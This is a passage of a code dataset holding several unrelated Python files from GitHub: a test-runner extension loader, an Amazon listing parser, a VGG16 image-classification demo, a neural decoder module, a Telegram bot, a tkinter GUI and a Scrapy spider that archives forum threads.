function!\")\n\n return extension_module.register_extension\n\n\ndef register_extensions(\n extensions: Sequence[Callable[[], dict]],\n) -> Tuple[Iterable[Type[TargetBase]], Iterable[Type[Host]]]:\n \"\"\"Returns lists of targets and hosts returned from given extension functions.\"\"\"\n\n targets, hosts = [], []\n\n for register_fn in extensions:\n extension = register_fn()\n\n if \"target\" in extension:\n if isinstance(extension[\"target\"], list):\n targets.extend(extension[\"target\"])\n else:\n targets.append(extension[\"target\"])\n\n if \"host\" in extension:\n if isinstance(extension[\"host\"], list):\n hosts.extend(extension[\"host\"])\n else:\n hosts.append(extension[\"host\"])\n\n return targets, hosts\n\n\ndef load_extensions() -> Tuple[Iterable[Type[TargetBase]], Iterable[Type[Host]]]:\n \"\"\"Returns the external targets and hosts defined by user.\n\n This function loads the external targets and hosts found in extensions specified\n by PHOENIX_TRUNNER_EXT environment variable. The path added to PHOENIX_TRUNNER_EXT\n should be a directory with a file or files that ends with *_ext.py suffix. To successfully\n load the extension, it must define a function register_extension() that returns dict with\n keywords \"host\" and \"target\" mapping new classes.\n\n Example of such extension:\n File phoenix-rtos-project/dummy_target_tests/dummy_ext.py\n\n from trunner.target import IA32GenericQemuTarget\n from trunner.host import EmulatorHost\n\n\n class DummyTarget(IA32GenericQemuTarget):\n name = \"ia32-dummy-qemu\"\n\n\n class DummyHost(EmulatorHost):\n name = \"emu-dummy-host\"\n\n\n def register_extension():\n return {\n \"target\": DummyTarget,\n \"host\": DummyHost,\n }\n \"\"\"\n\n paths = read_extensions_paths()\n register_fns = []\n\n for path in sorted(paths, key=lambda p: p.name):\n fn = load_register_fn(path)\n if fn:\n register_fns.append(fn)\n\n return register_extensions(register_fns)\n","repo_name":"phoenix-rtos/phoenix-rtos-tests","sub_path":"trunner/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7413019199","text":"\n\nfrom lxml import etree\n\n\ndef Available_handle(sellers_list_responses):\n\n etree_html = etree.HTML(sellers_list_responses)\n\n for nub in range(2,11):\n\n get_Price_xpath_list = [\n '//*[@id=\"olpOfferList\"]/div/div/div['+ str(nub) +']/div[1]/span/text()',\n ]\n\n get_Ship_xpath_list = [\n '//*[@id=\"olpOfferList\"]/div/div/div['+ str(nub) +']/div[1]/span[2]/@class',\n ]\n\n get_New_xpath_list = [\n '//*[@id=\"olpOfferList\"]/div/div/div['+ str(nub) +']/div[2]/div/span/text()'\n ]\n\n get_Seller_xpath_list = [\n '//*[@id=\"olpOfferList\"]/div/div/div['+ str(nub) +']/div[3]/h3/span/a/text()',\n ]\n\n get_offeringID_xpath_list = [\n '//*[@id=\"olpOfferList\"]/div/div/div['+ str(nub) +']/div[5]/div/form/input[9]/@value'\n ]\n\n for xpath in get_New_xpath_list:\n New_list = etree_html.xpath(xpath)\n if New_list:\n New = New_list[0].replace(' ', '').replace('\\n', '')\n print('New',New)\n\n if New != 'New':\n continue\n\n for xpath in get_Price_xpath_list:\n Price_list = etree_html.xpath(xpath)\n print('Price_list:',Price_list)\n if Price_list:\n try:\n Price = float(Price_list[0].replace('£', '').replace(' ', '').replace('\\n', '').replace(',', ''))\n except Exception as e:\n print(e)\n Price = -4\n else:\n Price = -1\n print('Price:',Price)\n\n for xpath in get_Ship_xpath_list:\n Ship_list = etree_html.xpath(xpath)\n if Ship_list:\n Ship = 'FBA'\n else:\n Ship = 'FBM'\n print('Ship:',Ship)\n\n for xpath in get_Seller_xpath_list:\n Seller_list = etree_html.xpath(xpath)\n if Seller_list:\n Seller = Seller_list[0].replace(' ', '').replace('\\n', '')\n else:\n Seller = ' Amazon.'\n print('Seller:',Seller)\n\n for xpath in get_offeringID_xpath_list:\n offeringID_list = etree_html.xpath(xpath)\n if offeringID_list:\n offeringID = offeringID_list[0]\n else:\n offeringID = '-1'\n print('offeringID',offeringID)\n\n break\n\n # # show_responses_html(responses=sellers_list_responses)\n # seller_allinfo_re_list = [\n # ##出现匹配失效\n # ' \\$[0-9].\\.[0-9]* *[\\s\\S]*?New[\\s\\S]*?olpSellerName[\\s\\S]*?<[\\s\\S]*?<[\\s\\S]*?>[\\s\\S]*?<[\\s\\S]*?from seller [\\s\\S]*?and price [\\s\\S]*?<',\n # '\\d+\\.\\d\\d|\\s*?<[\\s\\S]*?\\n\\n\\s*?New\\n\\s*?[\\s\\S]*?class=\"a-offscreen\"\">from seller [\\s\\S]*?and price [\\s\\S]*?<'\n # ]\n #\n # get_price_seller_re_list = [\n # ' \\$[0-9].\\.[0-9]* *[\\s\\S]*?New[\\s\\S]*?olpSellerName[\\s\\S]*?<[\\s\\S]*?<[\\s\\S]*?>[\\s\\S]*?<[\\s\\S]*?from seller ([\\s\\S]*?)and price ([\\s\\S]*?)<',\n # '\\d+\\.\\d\\d|\\s*?<[\\s\\S]*?\\n\\n\\s*?New\\n\\s*?[\\s\\S]*?class=\"a-offscreen\"\">from seller ([\\s\\S]*?)and price ([\\s\\S]*?)<'\n # ]\n #\n # get_offeringID_re_list = [\n # '\"offeringID.1\" value=\"([\\s\\S]*?)\"'\n # ]\n #\n # get_Ship_re_list = [\n # 'supersaver'\n # ]\n #\n # Stock_re_list = [\n # 'only\\s*\\d*\\s*of',\n # 'limit of'\n # ]\n #\n # #设置超时时间,匹配超过20秒则发出信号\n # signal.alarm(timeout)\n\n # for re_exp in seller_allinfo_re_list:\n # seller_info_result_list = re.findall(re_exp, sellers_list_responses)\n # for re_exp in get_offeringID_re_list:\n # try:\n # offeringID = re.findall(re_exp, seller_info_result_list[0])[0]\n # except Exception as e:\n # offeringID = '-1'\n # print('offeringID:', offeringID)\n #\n # ##获取seller,price\n # if seller_info_result_list:\n #\n # for re_exp in get_price_seller_re_list:\n #\n # get_price_seller_result_list = re.findall(re_exp, seller_info_result_list[0])\n #\n # if get_price_seller_result_list:\n # print(get_price_seller_result_list[0])\n # try:\n # self.product_info['Price'] = get_price_seller_result_list[0][1].replace(' ', '').replace(\n # '\\n', '').replace(',', '')[1:]\n # except IndexError as e:\n # self.product_info['Price'] = '-4'\n #\n # try:\n # Seller = get_price_seller_result_list[0][0].replace(' ', '').replace('\\n', '')\n # self.product_info['Seller'] = Seller\n # except IndexError as e:\n # Seller = '-4'\n #\n # break\n #\n # ##判断ship\n # for re_exp in get_Ship_re_list:\n # Ship_result_list = re.findall(re_exp, seller_info_result_list[0])\n # if Ship_result_list:\n # self.product_info['Ship'] = 'FBA'\n # else:\n # self.product_info['Ship'] = 'FBM'\n #\n # ##获取库存\n # self.Stock(ASIN=ASIN, offerListingID=offeringID)\n # break","repo_name":"Darren-kun/Xuggest","sub_path":"AMA_ANALYSIS/Available_handle_test.py","file_name":"Available_handle_test.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70800541847","text":"import json\nimport torch\nimport torchvision\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom torchvision import models, transforms\n\nDATA_DIR = \"src/sample_data/pytorch_advanced/1_image_classification/data\"\n\n\nclass BaseTransform:\n \"\"\"\n 画像をリサイズし、色の標準化を行うクラス\n imput:\n ・resize:リサイズ後の画像のサイズ\n ・mean(R,G,B):各色チャネルの平均値\n ・std(R,G,B):各色チャネルの標準偏差\n \"\"\"\n\n def __init__(self, resize, mean, std):\n self.base_transform = (\n transforms.Compose( # Composeを使用することでチェーンさせた前処理が簡単に書ける(前処理パイプライン的な)\n [\n transforms.Resize(resize), # リサイズ\n transforms.CenterCrop(resize), # 中央部のトリミング\n transforms.ToTensor(), # Tensor型に変換\n transforms.Normalize(mean, std), # 指定した色情報に標準化\n ]\n )\n )\n\n def __call__(self, img):\n return self.base_transform(img) # 前処理させるには、インスタンスにimageを渡す必要がある。\n\n\nclass LabelPredictor:\n \"\"\"\n NNの出力結果からラベルを推論するクラス\n imput: class_index(indexとラベルの辞書型)\n \"\"\"\n\n def __init__(self, class_index):\n self.class_index = class_index\n\n def predict(self, output):\n \"\"\"\n NNの出力に対し、全ラベルから対応する確率が最も高いラベル名を取得する\n input:output(NNからの出力 ⇒ tensor([1,1000]))\n \"\"\"\n detached = output.detach() # tensor型をnumpy型にするために、NWから切り離す\n max_id = np.argmax(detached.numpy()) # numpy配列の中で値が最も大きいindexを取得\n label_name = self.class_index[str(max_id)][1]\n return label_name\n\n\ndef load_and_preprocess_image(path, resize, mean, std):\n img = Image.open(path)\n loader = BaseTransform(resize, mean, std)\n preprocessed_img = loader(img) # tensor([3,224,224]) 224*224が3チャネル分\n return preprocessed_img\n\n\ndef load_vgg16():\n # 学習済みのvgg16モデルを読み込む\n # torchvision: pytorchのパッケージで、データセットや学習済みモデルなどで構成されている。\n\n net = models.vgg16(\n pretrained=True\n ) # vgg16を使用(学習済みパラメータを使用する場合はpretrainedを\"True\"にする)\n net.eval() # 推論モードに設定\n return net\n\n\ndef main():\n # 学習済みのvgg16モデルを読み込む\n net = load_vgg16()\n\n # 画像の読み込み及び前処理動作の確認\n resize = 224\n mean = (0.485, 0.456, 0.406)\n std = (0.229, 0.224, 0.225)\n img_path = f\"{DATA_DIR}/goldenretriever-3724972_640.jpg\" # (640, 426)サイズの画像\n preprocessed_img = load_and_preprocess_image(img_path, resize, mean, std)\n input = preprocessed_img.unsqueeze(0) # 0次元目のバッチディメンションを作成\n\n # ラベルの推論準備\n class_index = json.load(\n open(f\"{DATA_DIR}/imagenet_class_index.json\", \"r\")\n ) # ImageNetで与えられる1000種類のラベル群\n predictor = LabelPredictor(class_index)\n\n # 推論結果\n output = net(input) # return tensor([1,1000])\n\n # ラベルの推論\n predicted_name = predictor.predict(output)\n\n print(predicted_name)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ueda-hiroyuki/machine_learning","sub_path":"app/src/python_file/practice/pytorch/section1_review/load_vgg_model.py","file_name":"load_vgg_model.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21721379540","text":"import torch\nimport torch.nn as nn\n\nfrom vidar.arch.networks.layers.define.decoders.utils.conv_decoder import ConvDecoder\nfrom vidar.arch.networks.layers.define.decoders.utils.upsample_tensor import upsample_tensor\nfrom vidar.arch.networks.layers.define.perceiver.decoder import PerceiverBasicDecoder\nfrom vidar.utils.config import Config\nfrom vidar.utils.types import is_list, is_dict\nfrom vidar.utils.networks import freeze_layers_and_norms\nfrom vidar.utils.data import get_from_dict\n\n\ndef cat_dict_list(data):\n return {key: torch.cat([val[key] for val in data], 1) for key in data[0].keys()}\n\n\nclass BaseDecoder(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n\n if cfg.upsample_value != 1:\n self.upsample_mode = cfg.upsample_mode\n self.upsample_value = cfg.upsample_value\n if self.upsample_mode == 'convex':\n output_num_channels_mask = 9 * cfg.upsample_value ** 2\n self.decoder_mask = PerceiverBasicDecoder(\n cfg, output_num_channels=output_num_channels_mask)\n elif self.upsample_mode == 'decode':\n self.decoder_output = ConvDecoder(Config(\n num_ch_enc=128, num_ch_dec=[128, 64, 32], num_ch_out=cfg.output_num_channels))\n cfg.output_num_channels = self.decoder_output.num_ch_enc\n else:\n self.upsample_mode = None\n\n self.output_num_channels = cfg.output_num_channels\n self.max_queries = cfg.has('max_queries', 100000)\n\n self.freeze = cfg.has('freeze', False)\n self.detach_latent = cfg.has('detach_latent', False)\n self.use_prev_pred = cfg.has('use_prev_pred', False)\n self.use_previous = cfg.has('use_previous', None)\n\n self.multi_decoder = cfg.has('multi_decoder', False)\n if not self.multi_decoder:\n self.decoder = PerceiverBasicDecoder(cfg)\n else:\n self.decoder = nn.ModuleList()\n for _ in range(self.multi_decoder):\n self.decoder.append(PerceiverBasicDecoder(cfg))\n self.decoder_map = {}\n\n def pre_process(self, pred, info, previous):\n return pred\n\n def process(self, pred, info, previous):\n return pred\n\n def post_process(self, pred, info, previous):\n return pred\n\n def upsample_before(self, pred, query, z, shape):\n if self.upsample_mode == 'decode':\n pred = self.decoder_output(pred)\n return pred\n\n def upsample_after(self, pred, query, z, shape):\n if self.upsample_mode == 'convex':\n mask = self.decoder_mask(query, z)['predictions']\n if shape is not None:\n mask = mask.reshape([mask.shape[0]] + list(shape) + [mask.shape[-1]]).permute(0, 3, 1, 2)\n pred = upsample_tensor(pred, mask, up=self.upsample_value)\n return pred\n\n @staticmethod\n def reshape(pred, info):\n cam = get_from_dict(info, 'cam_scaled')\n shape = cam.hw if cam is not None else None\n if cam is not None:\n if not is_dict(pred):\n pred = pred.reshape([pred.shape[0]] + list(shape) + [pred.shape[-1]]).permute(0, 3, 1, 2)\n else:\n for key, val in pred.items():\n if is_dict(val):\n for key2, val2 in val.items():\n if val2.dim() == 3:\n pred[key][key2] = val2.reshape(\n [val2.shape[0]] + list(shape) + list(val2.shape[-1:])).permute(0, 3, 1, 2)\n elif val2.dim() == 4:\n pred[key][key2] = val2.reshape(\n [val2.shape[0]] + list(shape) + list(val2.shape[-2:])).permute(0, 3, 4, 1, 2)\n else:\n if val.dim() == 3:\n pred[key] = val.reshape(\n [val.shape[0]] + list(shape) + list(val.shape[-1:])).permute(0, 3, 1, 2)\n elif val.dim() == 4:\n pred[key] = val.reshape(\n [val.shape[0]] + list(shape) + list(val.shape[-2:])).permute(0, 3, 4, 1, 2)\n return pred, shape\n\n def forward(self, query, z, key, encode_data=None, decode_data=None,\n info=None, previous=None, extra=None, scene=None):\n\n # If latent is a dict, take the respective timestep\n z = z[key[0]] if is_dict(z) else z\n\n if self.detach_latent:\n z = z.detach()\n \n # Reshape if input data is 3D\n b = m = n = k = d = None\n\n is_3D = query.dim() == 4\n if is_3D:\n b, n, k, d = query.shape\n query = query.view(b, n * k, d)\n if extra is not None:\n extra = extra.view(b, n * k, -1)\n\n is_4D = query.dim() == 5\n if is_4D:\n b, m, n, k, d = query.shape\n query = query.view(b, n * m * k, d)\n if extra is not None:\n extra = extra.view(b, n * m * k, -1)\n\n # Freeze decoder if requested\n if self.training:\n freeze_layers_and_norms(self.decoder, flag_freeze=self.freeze)\n\n if not self.multi_decoder:\n decoder = self.decoder\n else:\n scene = scene[0]\n if scene not in self.decoder_map:\n self.decoder_map[scene] = len(self.decoder_map)\n decoder = self.decoder[self.decoder_map[scene]]\n\n is_grid = z.dim() == 5\n if is_grid:\n s1, s2 = z.shape[1:3]\n b, q, _ = query.shape\n z = z.permute(0, 3, 4, 1, 2).reshape(-1, s1, s2)\n query = query.reshape(b * q, 1, -1)\n\n shape = None if 'cam_scaled' not in info[key] else info[key]['cam_scaled'].hw\n\n # Decode queries\n if not is_grid:\n s, t = self.max_queries, query.shape[1]\n steps = t // s + 1\n cross_outputs = []\n for i in range(0, steps):\n st, fn = s * i, min(t, s * (i + 1))\n cross_outputs.append(decoder(\n query[:, st:fn], z, shape,\n extra=extra if extra is None else extra[:, st:fn])\n )\n else:\n s, t = self.max_queries, query.shape[0]\n steps = t // s + 1\n cross_outputs = []\n for i in range(0, steps):\n st, fn = s * i, min(t, s * (i + 1))\n cross_outputs.append(decoder(\n query[st:fn], z[st:fn], shape,\n extra=extra if extra is None else extra[:, st:fn])\n )\n for i in range(len(cross_outputs)):\n cross_outputs[i]['predictions'] = cross_outputs[i]['predictions'].permute(1, 0, 2)\n\n cross_output = {'predictions': torch.cat([val['predictions'] for val in cross_outputs], 1)}\n pred = cross_output['predictions']\n\n # Return to 3D if needed\n pred = pred.view(b, n, k, -1) if is_3D else pred\n pred = pred.view(b, m, n, k, -1) if is_4D else pred\n\n # prev_key = 'volumetric_1'\n # if self.use_prev_pred and previous is not None and prev_key in previous.keys():\n #\n # b, n, d, _ = pred.shape\n # prev_pred = previous[prev_key][key][0]['raw_pred']\n # all_pred = torch.cat([pred, prev_pred], -2)\n #\n # zvals = info[key]['zvals']\n # prev_zvals = previous[prev_key][key][0]['zvals']\n # prev_zvals = prev_zvals.view(b, -1, n).permute(0, 2, 1)\n # all_zvals = torch.cat([zvals, prev_zvals], -1)\n #\n # idx = torch.argsort(all_zvals, -1).unsqueeze(-1)\n # sorted_pred = torch.gather(all_pred, 2, idx.repeat(1, 1, 1, 4))\n # sorted_zvals = torch.gather(all_zvals, 2, idx.squeeze(-1))\n #\n # pred = sorted_pred\n # info[key]['zvals'] = sorted_zvals\n\n if previous is not None:\n previous = previous['info'][key]\n\n # Get embeddings info\n info = info[key]\n info['encode_data'] = encode_data\n info['decode_data'] = decode_data\n info['key'] = key\n\n pred = self.pre_process(pred, info, previous)\n pred, shape = self.reshape(pred, info)\n pred = self.upsample_before(pred, query, z, shape)\n pred = [self.process(p, info, previous) for p in pred] \\\n if is_list(pred) else self.process(pred, info, previous)\n pred = self.upsample_after(pred, query, z, shape)\n pred = self.post_process(pred, info, previous)\n\n for key in ['raw', 'weights']:\n if key in pred:\n info[key] = pred[key]\n\n # Return predictions\n\n return {\n 'predictions': pred,\n 'cross_output': cross_output,\n }\n\n\n\n\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/arch/networks/layers/define/decoders/utils/base_decoder.py","file_name":"base_decoder.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"17987072953","text":"import logging\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom telegram.ext import Updater, MessageHandler, Filters\n\nfrom config import DATABASE_URL, TOKEN, PORT, CHANNEL_MEME\nfrom messages import *\nfrom postgres import PostgresPersistence\nfrom utils import remove_message\n\n##########################################\n# this file serves as an entry point to the program.\n# here all the stuff is initialized.\n##########################################\n\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef start_session() -> scoped_session:\n engine = create_engine(DATABASE_URL, client_encoding=\"utf8\")\n return scoped_session(sessionmaker(bind=engine, autoflush=False))\n\n\ndef error(update: object, context: CallbackContext):\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n if update is Update:\n context.bot.send_message(-1001338514957,\n \"🤖 Affected Bot\\n@\" + context.bot.username +\n \"\\n\\n⚠ Error\\n\" + str(context.error) +\n \"\\n\\nCaused by Update\\n\" + str(update) + \"\",\n ParseMode.HTML)\n\n\nif __name__ == '__main__':\n session = start_session()\n updater = Updater(TOKEN, persistence=PostgresPersistence(session), use_context=True)\n\n dp = updater.dispatcher\n\n dp.add_handler(MessageHandler(Filters.text(\n [\"/help@CoronaVirusRobot\", \"/victims@CoronaVirusRobot\", \"/infect@CoronaVirusRobot\"]), remove_message))\n\n dp.add_handler(MessageHandler(Filters.update.channel_post & Filters.chat(CHANNEL_MEME), forward_meme))\n\n dp.add_handler(MessageHandler(Filters.chat(703453307), forward_meme2))\n\n # dp.add_handler(MessageHandler(Filters.update.channel_post | Filters.update.edited_channel_post, add_button))\n\n # dp.add_handler(ConversationHandler(\n # entry_points=[MessageHandler(Filters.regex('Breaking news ‼️'), new_breaking),\n # MessageHandler(Filters.regex('Scheduled post 🕓'), new_post)],\n # states={\n # NEWS: [MessageHandler(Filters.text, text)],\n # MEDIA: [MessageHandler(Filters.photo, add_photo),\n # MessageHandler(Filters.video, add_video),\n # MessageHandler(Filters.regex('Use placeholder 🖼️'), skip_photo),\n # MessageHandler(Filters.regex('Done ✅'), message_preview)],\n # PUBLISH: [MessageHandler(Filters.regex('Submit post 📣'), publish)]},\n # fallbacks=[MessageHandler(Filters.regex('Cancel 🗑'), cancel), CommandHandler('start', start)],\n # ))\n dp.add_error_handler(error)\n\n dp.bot.send_message(chat_id=703453307, text='BOT ONLINE ✅')\n\n updater.start_webhook(\"0.0.0.0\", PORT, TOKEN, webhook_url='https://ptb-militaernews.herokuapp.com/' + TOKEN)\n updater.idle()\n","repo_name":"PXNX/ptb-militaernews","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38328013839","text":"# -*- coding: utf-8 -*-\r\n#import ploting\r\nimport training\r\nimport data_preprocessing\r\nimport tkinter as tk\r\nroot=tk.Tk()\r\n#side可选为top,bottom,left,right\r\n#设置主窗口大小\r\n#root.geometry(\"800x600+10+10\")\r\n#主窗口名称\r\nroot.title(\"机器学习算法处理XAS数据软件\")\r\n\r\n#标签\r\n#label=tk.Label(root,text=\"hello world!\",height=2,width=8)\r\n#label.pack()\r\n\r\n#创建按钮\r\n#tk.Button(root,text=\"确定\",height=2,width=10,command=False).pack(side='left')\r\n#tk.Button(root,text=\"取消\",height=2,width=10).pack(side='left')\r\n#tk.Button(root,text=\"警告\",height=2,width=10,).pack(side='right')\r\n#tk.Button(root,text=\"退出\",height=2,width=10,command=root.quit).pack(side='right')\r\n\r\n\r\n#创建输入框\r\n#f1=tk.Frame(root)\r\n#tk.Label(f1,text=\"输入数据:\").pack(side='left',padx=5,pady=10)\r\n#e1=tk.StringVar()\r\n#tk.Entry(f1,width=50,textvariable=e1).pack(side='left')\r\n#e1.set('F:\\DOC\\Anaconda_3510\\02.Practice\\P04.CodeRefactoring180612')\r\n#f1.pack()\r\n\r\n#创建复选框\r\n#check_box=[('数据处理',1),('训练',2),('绘图',3),('演示',4)]\r\n#for text,value in check_box:\r\n# foo=tk.IntVar()\r\n# c=tk.Checkbutton(root,text=text,variable=foo,)\r\n# c.pack(anchor='w',)\r\n\r\n#创建消息\r\ntk.Message(root,text=\"本程序用于处理X射线吸收光谱(XAS)数据\",width=500,relief='groove',bg='lightblue').pack(side='top',padx=10,pady=10)\r\n\r\n\r\n#正式创建frame\r\nfrm_1=tk.Frame(root,width=300,height=500,bg='lightblue')\r\nfrm_2=tk.Frame(root,width=300,height=500,bg='lightblue')\r\nfrm_3=tk.Frame(root,width=300,height=500,bg='lightblue')\r\nfrm_4=tk.Frame(root,width=300,height=500,bg='lightblue')\r\nfrm_5=tk.Frame(root,width=1240,height=40,bg='lightblue')\r\n\r\n#创建按钮响应\r\ndef but_click_event_1():\r\n data_preprocessing.main()\r\n return 0\r\ndef but_click_event_2():\r\n# root.withdraw()\r\n return 0\r\n \r\n\r\n\r\n#1.创建控件\r\n#label_1=tk.Label(frm_1,text=\"数据地址:\").pack(side='top',padx=0,pady=10)\r\nlabel_1=tk.Label(frm_1,text=\"数据地址:\").place(x=10,y=10)\r\nlabel_1.pack(side='top',padx=0,pady=10)\r\n#label_1.place(x=10,y=10)\r\ne_1=tk.Entry(frm_1,width=20,).pack(side='top')\r\nbut_1=tk.Button(frm_1,text=\"开始处理\",width=8,command=but_click_event_1).pack(side='left')\r\nbut_1=tk.Button(frm_1,text=\"取消\",width=8,command=but_click_event_2).pack(side='left')\r\n\r\n#3.控件\r\n#4.控件\r\n\r\n#frm_3=tk.Frame(width=500,height=30,bg='white')\r\n#frm_4=tk.Frame(width=200,height=500,bg='white')\r\n#布局\r\n#frm_1.grid(row=0,column=0,columnspan=2,padx=1,pady=3 )\r\n#frm_2.grid(row=1,column=0,columnspan=2,padx=1,pady=3 )\r\n#frm_3.grid(row=2,column=0,columnspan=2,padx=1,pady=3 )\r\n#frm_4.grid(row=0,column=2,columnspan=3,padx=1,pady=3 )\r\n##固定大小\r\n#frm_1.grid_propagate(0)\r\n#frm_2.grid_propagate(0)\r\n#frm_3.grid_propagate(0)\r\n#frm_4.grid_propagate(0)\r\nfrm_5.pack(side='bottom',padx=1,pady=10)\r\nfrm_1.pack(side='left',padx=10,pady=10)\r\nfrm_2.pack(side='left',padx=10,pady=10)\r\nfrm_3.pack(side='left',padx=10,pady=10)\r\nfrm_4.pack(side='left',padx=10,pady=10)\r\n\r\n#frm_3.pack()\r\n#frm_4.pack()\r\n\r\n#进入主循环\r\nroot.mainloop()\r\n","repo_name":"Hu-WF/XASDataProcessingProject","sub_path":"MLProcessingXASwithGUI3.0.0/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42542407074","text":"import pickle as pk\nimport re\nfrom time import sleep\n\nfrom scrapy.http import Request\n\nfrom lor_spider_base import LORSpiderBase\n\nimport lorcfg as cfg\n\nclass LORUrlBuf():\n \"\"\"\n URL buffer class.\n \"\"\"\n def __init__(self, fname):\n self.fname = fname\n try:\n with open(fname, 'rb') as f:\n self.urls = pk.load(f)\n self.urls.sort()\n self.sorted = True\n except Exception as e:\n print(e)\n self.urls = []\n self.sorted = False\n #==========================================================================\n def append(self, url):\n \"\"\"\n Append a url to buffer\n \"\"\"\n self.sorted = False\n #\n url = str(url)\n #\n if url not in self.urls:\n self.urls.append(url)\n #==========================================================================\n def get(self):\n \"\"\"\n Get current URL-list head\n \"\"\"\n if not self.urls:\n return ''\n #\n if not self.sorted:\n self.urls.sort()\n #\n return self.urls[0]\n #==========================================================================\n def dump(self):\n \"\"\"\n Dump URL-list to disk\n \"\"\"\n if not self.sorted:\n self.urls.sort()\n #\n with open(self.fname, 'wb+') as f:\n pk.dump(self.urls, f)\n #==========================================================================\n def pop(self, url):\n \"\"\"\n Pop the head of URL-list\n \"\"\"\n if not self.sorted:\n self.urls.sort()\n #\n url = str(url)\n #\n if self.urls[0] not in url:\n raise ValueError\n #\n self.urls.remove(self.urls[0])\n self.dump()\n###############################################################################\nclass LORSpider(LORSpiderBase):\n \"\"\"\n TODO: Сделать скрипт более устойчивым к преждевременным остановкам\n\n 1. Научиться обходит \"автобаны\" с помощью списков проксей.\n Списко проксей можно формировать отдельным скриптом.\n \"\"\"\n name = 'GetLOR'\n\n arch = []\n arch_n = 0\n topic = []\n topic_n = 0\n deleted_msg = 0\n #==========================================================================\n def __init__(self, name=None, **kwargs):\n LORSpiderBase.__init__(self, name, **kwargs)\n #\n self.arch = LORUrlBuf(cfg.PARSER_BASE_PATH + '/arch.pkl')\n self.topic = LORUrlBuf(cfg.PARSER_BASE_PATH + '/topic.pkl')\n #\n with open('arch_urls.txt', 'r') as f:\n start_urls = f.readlines()\n self.arch_n = len(start_urls)\n if not self.arch.urls and not self.topic.urls:\n for url in start_urls:\n self.arch.append(url[:-1])\n #Dump all the urls\n self.arch.dump()\n try:\n with open(cfg.PARSER_BASE_PATH + '/topic_num.pkl', 'rb') as f:\n n = pk.load(f)\n self.topic_n = max(n, len(self.topic.urls))\n except Exception as e:\n print(e)\n #==========================================================================\n def on_login(self, response):\n if self.has_logged_in(response):\n #Не закончили траверс архива\n if self.arch.urls:\n return Request(self.domain_name + self.arch.get(), callback=self.on_arch_enter)\n #Не закончили траверс списка топиков\n if self.topic.urls:\n return Request(self.domain_name + self.topic.get(), callback=self.on_topic_enter)\n #Данные уже скачаны!!!\n return None\n return None\n #==========================================================================\n def on_arch_enter(self, response):\n \"\"\"\n Парсим страницы архива, форомируем список URL-ов для топиков\n \"\"\"\n self.log_print('==================================')\n self.log_print('Arch left:', len(self.arch.urls), 'of', self.arch_n)\n self.log_print('==================================')\n msgtable = response.css('table[class=\"message-table\"]')\n for l in msgtable.css('a::attr(href)').getall():\n if 'user-filter' in l or 'page' in l:\n continue\n l = l.split('?')[0]\n if l not in self.topic.urls:\n self.topic.append(l)\n self.topic.dump()\n #\n next_page = response.css('a[rel=\"next\"]::attr(href)').get()\n if next_page:\n sleep(4)\n self.log_print('Will goto:', next_page)\n return Request(self.domain_name + next_page, callback=self.on_arch_enter)\n #\n self.arch.pop(response.url)\n #Обходим все страницы из self.arch.urls\n next_page = self.arch.get()\n if next_page:\n next_url = self.domain_name + next_page\n self.log_print('Will goto:', next_url)\n sleep(4)\n return Request(next_url, callback=self.on_arch_enter)\n #Сохраняем список топиков\n self.topic.dump()\n self.topic_n = len(self.topic.urls)\n #Сохраняем общее количество топиков\n with open(cfg.PARSER_BASE_PATH + '/topic_num.pkl', 'wb+') as f:\n pk.dump(self.topic_n, f)\n #Теперь обходим топики\n self.log_print('Will visit topics...')\n next_url = self.domain_name + self.topic.get()\n return Request(next_url, callback=self.on_topic_enter)\n #==========================================================================\n def go_next(self, response):\n #Обходим все страницы из self.topic\n next_topic = self.topic.get()\n if next_topic:\n next_url = self.domain_name + next_topic\n self.log_print('Will goto:', next_url)\n sleep(4)\n return Request(next_url, callback=self.on_topic_enter)\n return self.logout(response)\n #--------------------------------------------------------------------------\n def on_topic_enter(self, response):\n \"\"\"\n Парсим топик, сохраняем сообщения\n \"\"\"\n return self.topic_enter_handler(response, self.topic.urls)\n #--------------------------------------------------------------------------\n def get_topic_messages(self, response):\n \"\"\"\n Парсим топик, сохраняем сообщения\n \"\"\"\n topic_data = self.get_comments(response)\n out_file = cfg.PARSER_BASE_PATH + '/topic'\n out_file += re.sub(r'/', '_', self.topic.urls[0]) + '.pkl'\n topic_data.to_pickle(out_file)\n\n self.deleted_msg += len(topic_data[topic_data['DelReason'] != ''])\n #Этот топик мы уже прошли\n self.topic.pop(response.url)\n \n return self.go_next(response)\n###############################################################################\nif __name__ == '__main__':\n from scrapy.crawler import CrawlerProcess\n\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'})\n\n process.crawl(LORSpider)\n process.start()\n process.join()\nelse:\n SPIDER = LORSpider()\n","repo_name":"shkolnick-kun/lor_neuro_rat","sub_path":"scrap_lor.py","file_name":"scrap_lor.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"5976459754","text":"'''-----Group 7 Members-----\r\n---------------------------------\r\nJavier, Joyce 